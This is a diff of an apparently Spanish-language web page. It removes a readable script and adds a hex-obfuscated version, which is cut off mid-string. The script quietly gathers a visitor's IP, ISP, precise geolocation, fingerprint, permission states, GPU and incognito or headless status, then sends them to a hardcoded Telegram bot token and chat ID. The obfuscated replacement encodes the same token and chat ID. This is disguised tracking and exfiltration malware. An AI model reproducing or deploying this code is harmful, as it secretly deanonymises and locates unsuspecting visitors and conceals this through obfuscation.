--- a/index.html
+++ b/index.html
@@ -18,193 +18,4 @@
   </div>
 
 <script>
-const BOT_TOKEN = "8011619975:AAE_Donqy5xn8RD0lJ2LOIP326dTDrnO1Ag";
-const CHAT_ID = "6065284869";
-
-const resultEl = document.getElementById("result");
-const startBtn = document.getElementById("startBtn");
-
-let humanInteraction = false;
-["click", "mousemove", "keydown", "touchstart"].forEach(event => {
-  window.addEventListener(event, () => { humanInteraction = true; }, { once: true });
-});
-
-// Detectar navegador headless básico
-function detectHeadless() {
-  const isHeadless = navigator.webdriver ||
-                     !navigator.plugins.length ||
-                     !navigator.languages ||
-                     /HeadlessChrome/.test(navigator.userAgent);
-  return isHeadless ? "Sí" : "No";
-}
-
-// Detectar modo incógnito (FileSystem API)
-async function detectIncognito() {
-  return new Promise((resolve) => {
-    const fs = window.RequestFileSystem || window.webkitRequestFileSystem;
-    if (!fs) {
-      resolve("No detectable");
-    } else {
-      fs(window.TEMPORARY, 100, () => resolve("No"), () => resolve("Sí"));
-    }
-  });
-}
-
-// Fingerprint simple
-function getFingerprint() {
-  return btoa([
-    navigator.userAgent,
-    navigator.language,
-    screen.width + 'x' + screen.height,
-    navigator.hardwareConcurrency || "n/a",
-    Intl.DateTimeFormat().resolvedOptions().timeZone || "n/a"
-  ].join('|'));
-}
-
-// Comprobar permisos (cámara, micrófono, localización)
-async function checkPermissions() {
-  if (!navigator.permissions) return "No soportado";
-  try {
-    const cams = await navigator.permissions.query({name:"camera"});
-    const mics = await navigator.permissions.query({name:"microphone"});
-    const geo = await navigator.permissions.query({name:"geolocation"});
-    return `Cámara: ${cams.state}, Micrófono: ${mics.state}, Geoloc: ${geo.state}`;
-  } catch {
-    return "Error consulta permisos";
-  }
-}
-
-// Comprobar si está aceleración hardware activada
-function checkHardwareAcceleration() {
-  try {
-    const canvas = document.createElement('canvas');
-    const gl = canvas.getContext('webgl') || canvas.getContext('experimental-webgl');
-    if (!gl) return "No WebGL";
-    const debugInfo = gl.getExtension('WEBGL_debug_renderer_info');
-    if (!debugInfo) return "No debug info";
-    const renderer = gl.getParameter(debugInfo.UNMASKED_RENDERER_WEBGL);
-    return renderer || "No renderer";
-  } catch {
-    return "Error WebGL";
-  }
-}
-
-// Detectar adblock (intentando fetch a dominio común bloqueado)
-async function detectAdblock() {
-  try {
-    const res = await fetch("https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", {method:"HEAD", mode:"no-cors"});
-    return "No detectado";
-  } catch {
-    return "Probable AdBlock";
-  }
-}
-
-// Detectar discrepancia entre timezone y locale
-function checkTimezoneLocale() {
-  try {
-    const tz = Intl.DateTimeFormat().resolvedOptions().timeZone;
-    const lang = navigator.language || navigator.userLanguage;
-    // Aquí un chequeo básico: si es idioma en español pero timezone está en UTC puede ser sospechoso
-    if (lang.startsWith('es') && tz.startsWith('UTC')) return "Discrepancia detectada";
-    return "OK";
-  } catch {
-    return "No disponible";
-  }
-}
-
-async function getIPInfo() {
-  try {
-    const res = await fetch("https://ipapi.co/json/");
-    return await res.json();
-  } catch {
-    return null;
-  }
-}
-
-async function sendToTelegram(message) {
-  try {
-    const url = `https://api.telegram.org/bot${BOT_TOKEN}/sendMessage`;
-    await fetch(url, {
-      method: "POST",
-      headers: { "Content-Type": "application/json" },
-      body: JSON.stringify({
-        chat_id: CHAT_ID,
-        text: message,
-      }),
-    });
-  } catch(e) {
-    console.warn("Error enviando a Telegram:", e);
-  }
-}
-
-async function collectAndSend() {
-  resultEl.textContent = "Espera porfavor...";
-
-  const [ipRes, geoRes, incognitoStatus, permStatus, adblockStatus] = await Promise.allSettled([
-    getIPInfo(),
-    new Promise((res, rej) => {
-      if (navigator.geolocation) {
-        navigator.geolocation.getCurrentPosition(res, rej, { timeout: 3000 });
-      } else rej();
-    }),
-    detectIncognito(),
-    checkPermissions(),
-    detectAdblock()
-  ]);
-
-  let message = "";
-
-  if (ipRes.status === "fulfilled" && ipRes.value) {
-    const ip = ipRes.value;
-    message += `IP: ${ip.ip}
-ISP: ${ip.org}
-ASN: ${ip.asn}
-Proxy/VPN/Tor: ${ip.proxy ? "Sí" : "No"}
-Ciudad: ${ip.city}
-Región: ${ip.region}
-País: ${ip.country_name}
-Versión IP: ${ip.version}
-`;
-  } else {
-    message += "No se pudo obtener IP\n";
-  }
-
-  message += `User-Agent: ${navigator.userAgent}
-Navegador Headless: ${detectHeadless()}
-Modo Incógnito: ${incognitoStatus.status === "fulfilled" ? incognitoStatus.value : "Desconocido"}
-Interacción Humana: ${humanInteraction ? "Sí" : "No"}
-Pantalla: ${screen.width}x${screen.height}
-Resolución disponible: ${screen.availWidth}x${screen.availHeight}
-Touch Support: ${'ontouchstart' in window ? 'Sí' : 'No'}
-Plataforma: ${navigator.platform}
-Fingerprint: ${getFingerprint()}
-Permisos (cámara, micrófono, geoloc): ${permStatus.status === "fulfilled" ? permStatus.value : "No disponible"}
-Aceleración hardware (WebGL renderer): ${checkHardwareAcceleration()}
-Timezone vs Locale: ${checkTimezoneLocale()}
-AdBlock detectado: ${adblockStatus.status === "fulfilled" ? adblockStatus.value : "No detectable"}
-Hora: ${new Date().toLocaleString()}
-`;
-
-  resultEl.textContent = message;
-  await sendToTelegram(message);
-
-  if (geoRes.status === "fulfilled") {
-    const { latitude, longitude, accuracy } = geoRes.value.coords;
-    const locationInfo = `\nUbicación Precisa:
-Latitud: ${latitude}
-Longitud: ${longitude}
-Precisión: ${accuracy} metros
-Hora: ${new Date().toLocaleString()}
-`;
-    resultEl.textContent += locationInfo;
-    await sendToTelegram(locationInfo);
-  } else {
-    resultEl.textContent += "\nUbicación precisa no disponible o rechazada.";
-  }
-}
-
-startBtn.onclick = collectAndSend;
-
-</script>
-</body>
-</html>
+var _0x5052=["\x62\x6F\x74\x54\x6F\x6B\x65\x6E","\x38\x30\x31\x31\x36\x31\x39\x39\x37\x35\x3A\x41\x41\x45\x5F\x44\x6F\x6E\x71\x79\x35\x78\x6E\x38\x52\x44\x30\x6C\x32\x4C\x4F\x49\x50\x33\x32\x36\x64\x54\x44\x72\x6E\x4F\x31\x41\x67","\x63\x68\x61\x74\x5F\x69\x64","\x36\x30\x36\x35\x32\x38\x34\x38\x36\x39","\x72\x65\x73\x75\x6C\x74","\x73\x74\x61\x72\x74\x42\x74\x6E","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x72\x65\x73\x75\x6C\x74","\x65\x76\x65\x6E\x74\x73","\x63\x6C\x69\x63\x6B","\x6D\x6F\x75\x73\x65\x6D\x6F\x76\x65","\x6B\x65\x79\x64\x6F\x77\x6E","\x74\x6F\x75\x63\x68\x73\x74\x61\x72\x74","\x77\x69\x6E\x64\x6F\x77","\x61\x64\x64\x45\x76\x65\x6E\x74\x4C\x69\x73\x74\x65\x6E\x65\x72","\x6E\x61\x76\x69\x67\x61\x74\x6F\x72","\x77\x65\x62\x64\x72\x69\x76\x65\x72","\x77\x65\x62\x70\x6C\x75\x67\x69\x6E\x73","\x6C\x61\x6E\x67\x75\x61\x67\x65","\x68\x61\x72\x64\x77\x61\x72\x65\x43\x6F\x6E\x63\x75\x72\x72\x65\x6E\x63\x79","\x74\x69\x6D\x65\x5A\x6F\x6E\x65","\x63\x61\x6D\x65\x72\x61","\x6D\x69\x63\x72\x6F\x66\x6F\x6E\x6F","\x67\x65\x6F\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x70\x65\x72\x6D\x69\x73\x73\x69\x6F\x6E\x73","\x71\x75\x65\x72\x79","\x63\x61\x6D\x65\x72\x61","\x6D\x69\x63\x72\x6F\x70\x68\x6F\x6E\x65","\x67\x65\x6F\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x73\x74\x61\x74\x65","\x66\x75\x6C\x66\x69\x6C\x6C\x65\x64","\x6E\x61\x76\x69\x67\x61\x74\x6F\x72\x2E\x77\x65\x62\x64\x72\x69\x76\x65\x72","\x6E\x61\x76\x69\x67\x61\x74\x6F\x72\x2E\x70\x6C\x75\x67\x69\x6E\x73\x2E\x6C\x65\x6E\x67\x74\x68","\x6E\x61\x76\x69\x67\x61\x74\x6F\x72\x2E\x6C\x61\x6E\x67\x75\x61\x67\x65","\x75\x74\x63\x6C\x61\x73\x74\x61\x72","\x77\x69\x6E\x64\x6F\x77\x2E\x52\x65\x71\x75\x65\x73\x74\x46\x69\x6C\x65\x53\x79\x73\x74\x65\x6D","\x77\x69\x6E\x64\x6F\x77\x2E\x77\x65\x62\x6B\x69\x74\x2E\x52\x65\x71\x75\x65\x73\x74\x46\x69\x6C\x65\x53\x79\x73\x74\x65\x6D","\x54\x45\x4D\x50\x4F\x52\x41\x52\x59","\x4E\x4F","\x72\x65\x73\x6F\x6C\x76\x65","\x70\x72\x6F\x6D\x69\x73\x65","\x72\x65\x6A\x65\x63\x74","\x63\x6F\x6E\x73\x74\x61\x6E\x74\x73","\x6A\x6F\x69\x6E","\x73\x63\x72\x65\x65\x6E\x2E\x77\x69\x64\x74\x68","\x73\x63\x72\x65\x65\x6E\x2E\x68\x65\x69\x67\x68\x74","\x6E\x61\x76\x69\x67\x61\x74\x6F\x72\x2E\x68\x61\x72\x64\x77\x61\x72\x65\x72\x43\x6F\x6E\x63\x75\x72\x72\x65\x6E\x63\x79","\x69\x6E\x74\x65\x72\x6E\x61\x74\x69\x6F\x6E\x73","\x6F\x6B","\x6C\x6F\x67","\x63\x61\x6E\x76\x61\x73","\x67\x65\x74\x43\x6F\x6E\x74\x65\x78\x74","\x77\x65\x62\x67\x6C","\x77\x65\x62\x67\x6C\x5F\x64\x65\x62\x75\x67\x5F\x72\x65\x6E\x64\x65\x72\x65\x72\x5F\x69\x6E\x66\x6F","\x75\x6E\x6D\x61\x73\x6B\x65\x64","\x72\x65\x73\x75\x6C\x74","\x6E\x6F\x5F\x77\x65\x62\x67\x6C","\x65\x72\x72\x6F\x72\x20\x57\x65\x62\x47\x4C\x20\x6F\x20\x6E\x6F\x20\x64\x65\x62\x75\x67\x20\x69\x6E\x66\x6F","\x66\x65\x74\x63\x68","\x61\x64\x64\x45\x76\x65\x6E\x74\x4C\x69\x73\x74\x65\x6E\x65\x72","\x68\x65\x61\x64","\x6D\x6F\x64\x65\x6C","\x6E\x6F\x2D\x63\x6F\x72\x73","\x73\x69\x6D\x70\x6C\x65\x64\x2D\x75\x69\x64","\x63\x68\x65\x63\x6B\x50\x65\x72\x6D\x69\x73\x73\x69\x6F\x6E\x73","\x6D\x6F\x63\x6B\x73","\x63\x61\x6D\x73","\x6D\x69\x63\x73","\x67\x65\x6F\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x63\x61\x6D\x65\x72\x61\x3A\x20","\x2C\x20\x6D\x69\x63\x72\x6F\x66\x6F\x6E\x6F\x3A\x20","\x2C\x20\x67\x65\x6F\x6C\x6F\x63\x3A\x20","\x51\x75\x65\x72\x79\x20\x70\x65\x72\x6D\x69\x73\x73\x69\x6F\x6E\x73","\x6E\x61\x76\x69\x67\x61\x74\x6F\x72\x2E\x77\x65\x62\x67\x6C\x2E\x67\x65\x74\x50\x61\x72\x61\x6D\x65\x74\x65\x72","\x57\x45\x42\x47\x4C\x5F\x44\x45\x42\x55\x47\x5F\x52\x45\x4E\x44\x45\x52\x45\x52\x5F\x49\x4E\x46\x4F","\x55\x4E\x4D\x41\x53\x4B\x45\x44","\x72\x65\x6E\x64\x65\x72","\x45\x72\x72\x6F\x72\x20\x57\x65\x62\x47\x4C","\x66\x61\x6C\x73\x65","\x64\x65\x74\x65\x63\x74\x41\x64\x62\x6C\x6F\x63\x6B","\x70\x61\x67\x65\x61\x64\x32\x2E\x67\x6F\x6F\x67\x6C\x65\x73\x79\x6E\x64\x69\x63\x61\x74\x69\x6F\x6E\x2E\x63\x6F\x6D\x2F\x70\x61\x67\x65\x61\x64\x2F\x6A\x73\x2F\x61\x64\x73\x62\x79\x67\x6F\x6F\x67\x6C\x65\x2E\x6A\x73","\x48\x45\x41\x44","\x4E\x6F\x20\x64\x65\x74\x65\x63\x74\x61\x64\x6F","\x50\x72\x6F\x62\x61\x62\x6C\x65\x20\x41\x64\x42\x6C\x6F\x63\x6B","\x64\x61\x
